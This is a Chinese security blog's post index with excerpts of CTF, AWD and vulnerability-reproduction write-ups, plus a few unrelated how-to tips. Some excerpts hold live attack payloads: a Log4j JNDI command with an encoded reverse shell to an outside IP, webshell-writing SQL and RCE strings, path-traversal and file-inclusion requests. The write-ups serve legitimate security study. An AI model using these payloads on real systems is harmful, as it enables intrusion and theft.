qq_48511129的博客

原创 ZZCMS漏洞复现和代码审计

ZZCMS漏洞复现和代码审计

原创 2022RWCTF体验赛web的wp

1.Digital Souvenir兑换码RealworldIsAwesome2.log4flag参考https://le1a.gitee.io/posts/3e4e56bc/启动jndi服务java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C “bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMDEuMzQuNDYuOTQvMTIzNDUgMD4mMQ==}|{base64,-d}|{bash,-

原创 wordpress(awd复现)

漏洞一:phpmyadmin数据库getshell在网站源码位置发现phpmyadmin文件夹，进行文件访问弱口令root,root进入mysql后台(也可以在数据库配置文件中查看)phpmyadmin后台执行sql语句select “<?php eval($_POST[cjm]);” into outfile “/app/cjm.php”;成功getshell漏洞二:phpmyadmin后台文件包含登入phpmyadmin的后台http://114.67.175.224:10477.

原创 万众电子期刊在线阅读系统(awd复现)

网站源码D盾扫描，没有发现自带后门在用seay结合功能点进行源码审计漏洞一：登录框sql注入写webshell尝试用一句话木马登录，成功登录后台。万能密码admin’ or 1=1#密码随便登录后发现是万众电子期刊在线阅读系统源码分析跟踪function_cleanstr函数，发现只是用htmlspecialchars处理htmlspecialchars() 函数把一些预定义的字符转换为 HTML 实体预定义的字符有：在定位_query函数发现它直接执行了sql语句没有进行过

原创 XML漏洞

XML指可扩展的标记语言，设计的宗旨是传输数据，而不是显示数据。目前主要是作为配置文件。在java和php中都可以使用xml作为文件配置和数据传输载体(现在基本使用json传输数据,xml用的少)。XML语法1.所有XML元素都须有闭合标签2.XML标签对大小写敏感3.XML文档必须有根元素4.XML的注释 5.XML的属性值须加引号6.<?xml version="1.0" encoding="UTF-8" ?> XML元素的命名规则1.名称可以包含字母、数字及其他

原创 苹果CMS网站awd复现

D盾扫描无结果漏洞一:自带大马后门使用方法漏洞二：前台rce进行rcewd={if-A:print(fputs%28fopen%28base64_decode%28Yy5waHA%29,w%29,base64_decode%28PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz4x%29%29)}{endif-A}进行攻击，该payload是直接生成一个c.php一句话木马文件，连接密码为c。参考https://blog.csdn.net/m0_37438418/artic

原创 jicao

主要观察json_decode是对json格式的字符串进行编码，json格式自己百度，后面判断json[‘x’]==“wllm”,所以

原创 cfs靶场内网渗透

靶场wp( 西域大都护府制作的wp)https://mp.weixin.qq.com/s/3QEBMnbByWDSpfrXdJuGPgviper渗透效果

原创 cfs靶场内网渗透

靶场WPhttps://mp.weixin.qq.com/s?__biz=MzkwNTI4MDI2OQ==&mid=2247485004&idx=1&sn=7f0622293317564b0efcecf75e8dacbc&chksm=c0fb682ef78ce138ce4d31b1f4ac806d2bc669c54d48043e37731818547877a4cb8354314771&mpshare=1&scene=23&srcid=0113l8aT

原创 grafana目录遍历(CVE-2021-43798)复现

Grafana是一个跨平台、开源的数据可视化网络应用程序平台。复现地址弱口令admin/admin进入poc:/public/plugins/{插件名字}/…/…/…/…/…/…/…/…/etc/passwd进行抓包GET的url改为poc,成功读取文件受影响的plugins(插件)/public/plugins/news/../../../../../../../../etc/passwd/public/plugins/nodeGraph/../../../../../../../.

原创 java文件上传基础

在文件上传的过程中，未校验上传文件后缀类型或者效验文件后缀时，出现逻辑错误或者考虑不周，导致用户可以上传jsp,jspx等一些webshell文件，搜索Java程序中涉及到文件上传的方法。如MultipartFile，找到上传点之后，查看是否校验文件上传的后缀；查看是否校验限制了文件的大小；查看白名单或者黑名单校验后缀；查看是否通过文件类型来校验，从功能点出发，搜索常见上传功能点，如上传头像、上传附件、上传图片等等等。实列分析源码分析，该网站未对上传的文件进行任何处理利用方法，直接上传jsp，jsp

原创 java命令注入基础

在Java应用程序中，敏感函数的参数如Runtime.getRuntime(),exec(String command)如果该参数可由用户控制，而且未经过合理验证和过滤，则极易造成命令注入漏洞。Java 代码审计中，审计命令执行主要搜索是否有相关执行系统命令的类和方法，如”Runtime“、“ProcessBuilder“、”GroovyShell“等。查找利用链来触发到漏洞类或者漏洞方法。举例说明这是一个ping功能的网站源码分析，直接将用户输入的参数代入到exec执行，未进行过滤漏洞利用ht

原创 渗透信息收集

第一步：目录扫描目录扫描工具御剑、dirsearch、dirmap、dirb(kali自带)、dirbuster(比御剑好)https://sourceforge.net/projects/dirbuster/第二步：端口扫描和whois信息nmap扫描端口下面扫描都可以添加-Pn进行防火墙穿透半开扫描扫描指定IP开放端口，可以指定端口号1-65535，并且显示扫描过程nmap -sS -p 端口号 -v 192.168.1.1服务器禁止ping,进行穿透防火墙扫描nmap -Pn -A

原创 java的对象转型

java的对象类型转换解释1.父类引用子类对象，成为向上转型，属于自动转型。2.进行父类转型后我们能调用父类的方法，但不能调用子类的方法，如果要进行调用子类的方法我们就需要进行类型强制转换，成为向下转型。举例说明：父类定义public class Animal { public void cjm(){ System.out.println("我是父类"); }}Dog继承父类class Dog extends Animal{ public void

原创 2021祥云杯

安全检测尝试用admin/admin登录，发现成功登录输入一个百度的地址，发现跳转到了百度。于是尝试能不能跳转到本地http://127.0.0.1发现无法跳转网站很多都有一个admin后台目录，接着尝试能不能跳转到该目录发现成功跳转看到include123.php文件，于是接着跳转到该文件下面发现了一些php代码发现对get传的参数过滤了很多东西。本地文件包含，远程文件包含命令执行等基本都过滤了。暑假做题的时候做到了一道类似的题，把这些都过滤了，他用的方法是用session文件包含，因为

原创 Exception反序列

<?phphighlight_file(__FILE__);include('flag.php');$cs = file_get_contents('php://input');class ctfshow{ public $username='xxxxxx'; public $password='xxxxxx'; public function __construct($u,$p){ $this->username=$u; $th

原创 protected反序列化特点

<?phpinclude("flag.php");highlight_file(__FILE__);class FileHandler { protected $op; protected $filename; protected $content; function __construct() { $op = "1"; $filename = "/tmp/tmpfile"; $content = "Hel

原创 private反序列化特点

<?phpinclude 'flag.php';error_reporting(0);class Name{ private $username = 'nonono'; private $password = 'yesyes'; public function __construct($username,$password){ $this->username = $username; $this->password = $pa

原创 str_replace反序列化逃逸实例

<?phperror_reporting(0);class message{ public $from; public $msg; public $to; public $token='user'; public function __construct($f,$m,$t){ $this->from = $f; $this->msg = $m; $this->to = $t; }}

原创 pop链构造和phar://协议

phar类似java中的jar包，是一种压缩包。可以对php项目进行打包成 .phar类型的文件，也可以把某个功能模块打包直接发布。1.配置要想使用phar文件，必须将phar.readonly配置项配置为0或Off<?phpclass B{ public function __destruct(){ echo $this -> name; }}$phar = new Phar("test.phar"); $phar -> startBuff

原创 2021陇剑杯

过滤http，发现大量http数据包只发现少量dns流量包和没有发现ftp流量包所以判断出是http协议攻击2.1直接过滤HTTP包，右键选择“追踪流”进入tcp流将token进行jwt解码，出现jwt字段，所以判断出是jwt认证2.2过滤http，追踪tcp流，将token内容直接拿去base64解码得到{“alg”:“HS256”,“typ”:“JWT”}.{“id”:10086,“MapClaims”:{“aud”:“admin”,“username”:"admin"fX0.t

原创 2021赣网杯web和misc部分wp

webcheckinflag{134791e2-d93c-4d01-a71f-dcbe82d7fe08}gwb-web-easypop利用这个create_function函数闭合前面括号进行代码执行echo 2;}system(“cat /flag”);//exp<?phperror_reporting(0);$pwd=getcwd();class func{ public $mod1; public $mod2; public $key;}class

原创 2021湖湘杯

Webeasywill发现这里可以进行本地文件包含http://eci-2zec2ffu8ckzf4ciogou.cloudeci1.ichunqiu.com/?name=cfile&value=…/…/…/…/…/…/etc/passwd参考下面链接的pearcmd.php的巧妙利用https://tttang.com/archive/1312/构造payload?name=cfile&+config-create+/&value=…/…/…/usr/local/li

原创 2021西湖论剑wp

webOA?RCE?⽐赛的时候试了下不是弱⼝令（实际上就是admin123，但当时忘试这个了），所以就去⽹上找了改密码的⽅式，⽤这⾥的⽅法：信呼oa最新版本代码审计 - ma4ter$test = $this->jm->strlook(json_encode(array("msgtype"=>"editpass","user"=>"admin","pass"=>"lighting")),'d41d8cd98f00b2...

原创 2021江西工业互联网安全技术技能大赛决赛部分wp

智能制造题目给了一个流量包，从中找flag直接搜索flag得到flag为flag{jx2021} 风力发电题目给了一个流量包题目描述风力发电机平时正常转速2500转每分钟，但有一天风力发电机转速异常，请从流量包中找出异常的转速流量之和。在题目中发现第五个modbus流量包的数据很奇怪追踪TCP数据流，转换为hex进制发现这两列基本都是一样的，只有几个是不同的。找到这个数据的0a 12和这个数据的 0a a2两者相加就...

原创 2021年江西工控-OPC流量分析

⽤科来打开流量包，点击诊断进行源IP地址排序发现一个错误的tcp流量包在新的窗口中显示流量包发现一串特殊的数据53554E54616E68414D6A41794D513d3d进行hex转文本SUNTanhAMjAyMQ==在进行base64解码flag{ICSjx@2021}...

原创 江西省2021年工业互联网安全技术技能大赛

s7协议0300002402f080320100000003000e00050501120a100200010000830000000004000801。请解读以上协议内容，并准确的拿到此报文返回值，flag即为返回值。提交格式：flag{xxx}。原题，题目内容都没变flag{0300001602f0803203000000030002000100000501ff}工控流量分析使用科来对包进行重放分析发现3397、3398存在问...

转载 ubuntu报错解决ERROR 1045 (28000): Access denied for user ‘debian-sys-maint‘@‘localhost‘……

https://www.cnblogs.com/y-c-m520/p/14060382.html

原创 VulnHub-Mr-Robot

原创 VulnHub-Lampiao

原创 VulnHub-basic

原创 VulnHub-Lazysysadmin

原创 VulnHub-narak

原创 VulnHub-Me-and-My-Girlfriend-1

原创 phpstorm安装xdebug(windows10)

phpstorm的xdebug安装，看到网上很多教程，但自己照着他们操作的时候总是出现问题。我还是喜欢看视频安装，视频傻瓜教程。跟着视频安装，最终安装成功了。https://www.bilibili.com/video/BV1si4y147Ek?from=search&seid=3374145673670355662建议修改为视频中同样的php运行版本phpstorm修改php运行版本方法https://m.php.cn/tool/phpstorm/428820.html...

原创 [DDCTF2018]流量分析

在流量包中搜索tcp contains “KEY”追踪tcp流发现解密后为接着查看流量包，发现一张png图片。复制进行解码图片发现图片是一串字母ORC在线识别：https://www.onlineocr.net/zh_hant/进行图片识别可能会存在一些错误。自己对照字母看一遍根据提示套上ssh私钥格式-----BEGIN RSA PRIVATE KEY-----MIICXAIBAAKBgQDCm6vZmclJrVH1AAyGuCuSSZ8O+mIQiOUQCvN0HYbj815.

原创 pycharm安装gmpy2 出现ERROR的问题

部分报错代码Collecting gmpy2Using cached gmpy2-2.0.8.zip (280 kB)Using legacy ‘setup.py install’ for gmpy2, since package ‘wheel’ is not installed.Installing collected packages: gmpy2Running setup.py install for gmpy2 … error解决方法1.进入如下网址安装whell（轮子）：（别用pip

原创 awd之ssh不同登入方式

刚开始接触awd，ssh登入方式我碰到的都是直接给题目的主机端口，登入名用户，登入名密码。在一场awd比赛中，它直接给了这些文件和用户名，没有给登入密码当时我就没看懂啥意思，登了半天都没连上ssh，没办法只能直接找裁判员。之后才登进去的。原来哪个id_rsa文件是一个密钥。用来连接ssh的，在用户身份验证哪里方法选择public key,填上用户名，用户密码哪里导入id_rsa密钥文件。密码不用填，直接连接。之后连接成功。这真是一个大坑，由于连上ssh时间比较晚，差点被人家打爆了。...

原创 你的 OneDrive 帐户存在问题，它阻止你创建新的文档。请转到 OneDrive 了解详细信息。

这是我最近碰到的一个小问题，我的电脑自带的办公软件无法新建文件，说我的oneDrive账号存在问题，经过一段时间，解决了这个问题。你想通过电脑访问oneDrive的官网，很难弄，一直进不去。方法很简单，直接用手机下载一个OneDrive的app，登你的oneDrive账号进去。显示你的账号冻结，点击取消冻结你的账号，等待处理，时间可能很长，可能要一天，之后就会解冻账号，就能登入了。...

原创 如何制作u盘启动盘（微pe）

大多数的第三方软件，想大白菜，云骑士等都有很多捆绑软件，很流氓，有些用了一个月后还要激活，很烦人。要制作的直接去看b站,搜索微pe，看那个300百多万点击量的那个视频，将的很详细。附上微pe官网网址：http://www.wepe.com.cn/目前微pe工具要两块钱下载，为了支持一下人家，我就不发我下载的工具给你们。...